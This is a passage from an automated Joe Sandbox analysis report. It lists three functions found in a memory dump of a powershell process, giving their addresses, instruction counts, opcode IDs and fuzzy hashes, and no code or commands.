                                                                                                                              • Source File: 00000003.00000002.1974680922.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd9b840000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d747c4024410e6378e66d89bfa3661214e4122d48d2501f945339aadf12276ea
                                                                                                                              • Instruction ID: 132077b436eba43b6a8a0311e9fa7b540ba3de1d4d47cbb31b34049b973fb1bf
                                                                                                                              • Opcode Fuzzy Hash: d747c4024410e6378e66d89bfa3661214e4122d48d2501f945339aadf12276ea
                                                                                                                              • Instruction Fuzzy Hash: EA512432B0FA8A0FEBA59BA818716B476D2EF5D214B5E04BED04DC71E3DE18A8058341
                                                                                                                              Function 00007FFD9B8477F4 Relevance: .1, Instructions: 123COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000003.00000002.1974680922.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd9b840000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5a9ebf7d9a04f6a1ca21f57f2e5203ef94b4552476081b8366c6fe93a4b55150
                                                                                                                              • Instruction ID: 7bfcb41afb3719659e79910557433693e69bf50c11fb935c953838d5dd594e30
                                                                                                                              • Opcode Fuzzy Hash: 5a9ebf7d9a04f6a1ca21f57f2e5203ef94b4552476081b8366c6fe93a4b55150
                                                                                                                              • Instruction Fuzzy Hash: 5441C376E0FACA1FFBB697A818751B86A93EF5D254B5A00BAD059C71E3DD0C59008301
                                                                                                                              Function 00007FFD9B8443D6 Relevance: .1, Instructions: 110COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000003.00000002.1974680922.00007FFD9B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B840000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_3_2_7ffd9b840000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2189c7e0f813e283174a100f1259af1656b66bb10996d0190cadc0996d09f355
                                                                                                                              • Instruction ID: 2bb21e394ff51c1e0ec12dc7274f59e0a0b7bd54b06cd2cc8b070f55ee3db9f6
                                                                                                                              • Opcode Fuzzy Hash: 2189c7e0f813e283174a100f1259af1656b66bb10996d0190cadc0996d09f355
                                                                                                                              • Instruction Fuzzy Hash: 8C31F667B0FACA0BF7B19BA818712B466C6EF5D254B5E04BED05DC30E3ED1899058201